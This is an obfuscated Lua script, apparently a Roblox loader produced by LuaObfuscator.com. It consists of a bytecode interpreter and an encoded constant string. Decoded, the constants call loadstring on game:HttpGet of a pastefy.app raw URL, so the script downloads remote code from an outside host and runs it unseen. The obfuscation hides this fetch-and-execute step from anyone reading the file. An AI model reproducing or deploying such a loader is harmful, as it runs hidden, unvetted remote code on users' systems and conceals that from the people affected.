--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v87=0;local v88;while true do if (v87==0) then v88=v2(v0(v30,16));if v19 then local v125=0;local v126;while true do if (v125==0) then v126=v5(v88,v19);v19=nil;v125=1;end if (v125==1) then return v126;end end else return v88;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v89=(v31/((1 + 1)^(v32-(2 -(1 + 0)))))%((5 -(960 -(892 + 65)))^(((v33-(1 -0)) -(v32-(2 -1))) + ((2 -1) -0))) ;return v89-(v89%(620 -(555 + 64))) ;else local v90=1270 -(226 + 1044) ;local v91;while true do if (v90==(931 -((1583 -726) + (135 -61)))) then v91=(570 -(367 + 201))^(v32-1) ;return (((v31%(v91 + v91))>=v91) and (351 -(87 + 263))) or (927 -(214 + (893 -(67 + 113)))) ;end end end end local function v21() local v34=0;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + (2 -1) ;v34=1 + 0 ;end end end local function v22() local v36=0 -0 ;local v37;local v38;while true do if (v36==(998 -(915 + 82))) then return (v38 * (1208 -(802 + 150))) + v37 ;end if (v36==((1187 -(1069 + 118)) -(0 -0))) then v37,v38=v1(v16,v18,v18 + (5 -3) );v18=v18 + ((6 -3) -1) ;v36=1 -0 ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + (3 -2) + 2 );v18=v18 + (6 -2) ;return (v42 * (16777234 -(10 + 8))) + (v41 * (65012 + 524)) + (v40 * (1047 -(368 + 423))) + v39 ;end local function v24() local v43=v23();local v44=v23();local v45=3 -2 ;local v46=(v20(v44,443 -(416 + 26) ,63 -43 ) * ((1 + 1)^(56 -24))) + v43 ;local v47=v20(v44,459 -(145 + 293) ,461 -(44 + 386) );local v48=((v20(v44,1518 -((2078 -(1020 + 60)) + 488) )==(1 + 0)) and  -1) or (1 + 0) ;if (v47==(772 -(201 + (1994 -(630 + 793))))) then if (v46==(1138 -(116 + (3462 -2440)))) then return v48 * ((0 -0) -0) ;else local v112=0 + 0 ;while true do if (v112==0) then v47=3 -2 ;v45=0 -0 ;break;end end end elseif (v47==(2906 -(814 + 45))) then return ((v46==(0 -0)) and (v48 * (1/(0 + 0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-(362 + 661) ) * (v45 + (v46/((887 -(261 + 624))^(92 -40)))) ;end local function v25(v49) local v50;if  not v49 then local v92=0 -0 ;while true do if (v92==((601 + 1146) -(760 + (2715 -1728)))) then v49=v23();if (v49==(1913 -(1789 + 124))) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;local v51={};for v67=767 -(745 + 21) , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v93,v94,v95,v96,v97,v98,v99,v100) local v93=(function() return 0 -0 ;end)();local v94=(function() return;end)();local v95=(function() return;end)();while true do if (v93~= #"]") then else if (v94== #"}") then v95=(function() return v96()~=(0 + 0) ;end)();elseif (v94==2) then v95=(function() return v97();end)();elseif (v94== #"nil") then v95=(function() return v98();end)();end v99[v100]=(function() return v95;end)();break;end if (0~=v93) then else local v118=(function() return 0 -0 ;end)();local v119=(function() return;end)();while true do if (v118~=0) then else v119=(function() return 0;end)();while true do if (v119==0) then v94=(function() return v96();end)();v95=(function() return nil;end)();v119=(function() return 1;end)();end if (v119==1) then v93=(function() return  #"[";end)();break;end end break;end end end end return v93,v94,v95,v96,v97,v98,v99,v100;end;end)();local v53=(function() return function(v101,v102,v103) local v104=(function() return 0 -0 ;end)();while true do if (v104==0) then v101[v102-#"<" ]=(function() return v103();end)();return v101,v102,v103;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #":",v58 do FlatIdent_759F1,Type,Cons,v21,v24,v25,v59,v69=(function() return v52(FlatIdent_759F1,Type,Cons,v21,v24,v25,v59,v69);end)();end v57[ #"xnx"]=(function() return v21();end)();for v70= #":",v23() do local v71=(function() return v21();end)();if (v20(v71, #"]", #"[")~=0) then else local v107=(function() return 0;end)();local v108=(function() return;end)();local v109=(function() return;end)();local v110=(function() return;end)();local v111=(function() return;end)();while true do if (v107~=0) then else v108=(function() return 1700 -(1419 + 281) ;end)();v109=(function() return nil;end)();v107=(function() return 1 -0 ;end)();end if (v107==(75 -(71 + 3))) then local v123=(function() return 0;end)();local v124=(function() return;end)();while true do if (v123==0) then v124=(function() return 0 + 0 ;end)();while true do if ((2 -1)==v124) then v107=(function() return 2 -0 ;end)();break;end if (v124~=0) then else v110=(function() return nil;end)();v111=(function() return nil;end)();v124=(function() return 1;end)();end end break;end end end if (v107~=(243 -(187 + 54))) then else while true do if (v108== #"19(") then if (v20(v110, #"19(", #"xxx")== #":") then v111[ #"0313"]=(function() return v59[v111[ #"xnxx"]];end)();end v54[v70]=(function() return v111;end)();break;end if (v108== #"~") then local v128=(function() return 0;end)();local v129=(function() return;end)();while true do if (v128~=(780 -(162 + 618))) then else v129=(function() return 0 + 0 ;end)();while true do if (v129==(0 + 0)) then v111=(function() return {v22(),v22(),nil,nil};end)();if (v109==(0 -0)) then local v183=(function() return 0 + 0 ;end)();local v184=(function() return;end)();while true do if (v183~=(1636 -(1373 + 263))) then else v184=(function() return 0;end)();while true do if (0==v184) then v111[ #"asd"]=(function() return v22();end)();v111[ #"0836"]=(function() return v22();end)();break;end end break;end end elseif (v109== #"~") then v111[ #"asd"]=(function() return v23();end)();elseif (v109==2) then v111[ #"19("]=(function() return v23() -(2^(1016 -(451 + 549))) ;end)();elseif (v109== #"nil") then local v195=(function() return 0;end)();local v196=(function() return;end)();while true do if (v195==0) then v196=(function() return 0 + 0 ;end)();while true do if (v196==(0 -0)) then v111[ #"-19"]=(function() return v23() -(2^16) ;end)();v111[ #"0313"]=(function() return v22();end)();break;end end break;end end end v129=(function() return 1;end)();end if (v129==1) then v108=(function() return 2 -0 ;end)();break;end end break;end end end if (v108==2) then local v130=(function() return 1384 -(746 + 638) ;end)();local v131=(function() return;end)();while true do if (v130~=(0 + 0)) then else v131=(function() return 0;end)();while true do if (v131==1) then v108=(function() return  #"nil";end)();break;end if (v131~=0) then else if (v20(v110, #":", #" ")== #">") then v111[2 -0 ]=(function() return v59[v111[343 -(218 + 123) ]];end)();end if (v20(v110,2,1583 -(1535 + 46) )~= #"[") then else v111[ #"91("]=(function() return v59[v111[ #"19("]];end)();end v131=(function() return 1 + 0 ;end)();end end break;end end end if (v108~=0) then else local v132=(function() return 0;end)();local v133=(function() return;end)();while true do if (v132~=(0 + 0)) then else v133=(function() return 0;end)();while true do if (v133==0) then v109=(function() return v20(v71,2, #"-19");end)();v110=(function() return v20(v71, #"xnxx",6);end)();v133=(function() return 561 -(306 + 254) ;end)();end if (v133==(1 + 0)) then v108=(function() return  #"\\";end)();break;end end break;end end end end break;end end end end for v72= #"\\",v23() do v55,v72,v28=(function() return v53(v55,v72,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1 -0 ];local v65=v61[128 -(116 + 10) ];local v66=v61[1470 -(899 + 42 + 526) ];return function(...) local v73=v64;local v74=v65;local v75=v66;local v76=v27;local v77=1 + 0 ;local v78= -(2 -1);local v79={};local v80={...};local v81=v12("#",...) -(291 -(60 + 230)) ;local v82={};local v83={};for v105=572 -(426 + 146) ,v81 do if (v105>=v75) then v79[v105-v75 ]=v80[v105 + (739 -(542 + 196)) + (0 -0) ];else v83[v105]=v80[v105 + (1457 -(282 + 1174)) ];end end local v84=(v81-v75) + 1 ;local v85;local v86;while true do local v106=811 -(569 + 242) ;while true do if ((0==v106) or (2874<2181)) then v85=v73[v77];v86=v85[2 -1 ];v106=1;end if (1==v106) then if ((v86<=(1 + 2)) or (2689<=343)) then if ((v86<=(1 + 0)) or (1869==2009)) then if (v86>(1024 -(706 + 318))) then v83[v85[1253 -(367 + 354 + 530) ]]=v85[1274 -(945 + 326) ];else local v137=v85[4 -2 ];v83[v137]=v83[v137](v13(v83,v137 + 1 + 0 ,v78));end elseif ((v86>(702 -(271 + 429))) or (3546<2322)) then local v139=v85[2 + 0 ];local v140=v83[v85[(542 + 961) -(1408 + 92) ]];v83[v139 + (1087 -((1214 -753) + 625)) ]=v140;v83[v139]=v140[v85[4]];else local v144=0;local v145;local v146;local v147;local v148;local v149;while true do if ((v144==(1296 -(993 + 295))) or (2082==4773)) then v85=v73[v77];do return;end break;end if ((1 + 4)==v144) then v146,v147=v76(v83[v149](v13(v83,v149 + (1172 -(418 + 753)) ,v85[2 + 1 ])));v78=(v147 + v149) -1 ;v145=(0 -0) + 0 ;for v179=v149,v78 do local v180=0 + 0 ;while true do if ((3244>1055) and ((0 + 0)==v180)) then v145=v145 + (530 -(406 + 123)) ;v83[v179]=v146[v145];break;end end end v144=1775 -(1749 + 20) ;end if (7==v144) then v77=v77 + 1 ;v85=v73[v77];v83[v85[1 + 1 ]]();v77=v77 + (1323 -(1249 + 73)) ;v144=8;end if (v144==(2 + 1)) then v83[v149 + 1 ]=v148;v83[v149]=v148[v85[1149 -(466 + 679) ]];v77=v77 + ((1553 -(1126 + 425)) -1) ;v85=v73[v77];v144=4;end if ((v144==(11 -7)) or (3313<=1778)) then v83[v85[1902 -(106 + (2199 -(118 + 287))) ]]=v85[1 + 2 ];v77=v77 + (3 -2) ;v85=v73[v77];v149=v85[1 + 1 ];v144=14 -9 ;end if (v144==(5 -3)) then v77=v77 + (115 -(4 + 110)) ;v85=v73[v77];v149=v85[586 -(57 + 527) ];v148=v83[v85[1430 -(41 + (2507 -(118 + 1003))) ]];v144=106 -(17 + 86) ;end if ((v144==((0 -0) + 0)) or (1421>=2104)) then v145=nil;v146,v147=nil;v148=nil;v149=nil;v144=1 -0 ;end if (v144==(2 -1)) then v83[v85[168 -(122 + 44) ]]=v63[v85[5 -2 ]];v77=v77 + 1 ;v85=v73[v77];v83[v85[2]]=v63[v85[3]];v144=6 -(381 -(142 + 235)) ;end if ((1812<=3249) and (v144==6)) then v77=v77 + 1 + 0 ;v85=v73[v77];v149=v85[1 + 1 ];v83[v149]=v83[v149](v13(v83,v149 + (1 -0) ,v78));v144=72 -(30 + 35) ;end end end elseif (v86<=(4 + 1)) then if (v86>(1261 -(1043 + 214))) then v83[v85[7 -5 ]]();else v83[v85[1214 -((1465 -1142) + 889) ]]=v63[v85[7 -(1 + 3) ]];end elseif (v86>(586 -(361 + 219))) then do return;end else local v152=0;local v153;local v154;local v155;local v156;while true do if (v152==(321 -(53 + (1244 -(553 + 424))))) then v78=(v155 + v153) -(1 + 0) ;v156=413 -(15 + 398) ;v152=2;end if (v152==2) then for v181=v153,v78 do local v182=0;while true do if ((1623<=1957) and (v182==0)) then v156=v156 + (983 -(18 + 964)) ;v83[v181]=v154[v156];break;end end end break;end if (v152==(0 -(0 -0))) then v153=v85[2 + 0 ];v154,v155=v76(v83[v153](v13(v83,v153 + 1 + 0 ,v85[3])));v152=851 -(20 + 830) ;end end end v77=v77 + 1 + 0 + 0 ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403203Q00682Q7470733A2Q2F706173746566792E612Q702F52476F572Q4E5A352F72617700083Q0012023Q00013Q00122Q000100023Q00202Q00010001000300122Q000300046Q000100039Q0000026Q000100016Q00017Q00",v9(),...);
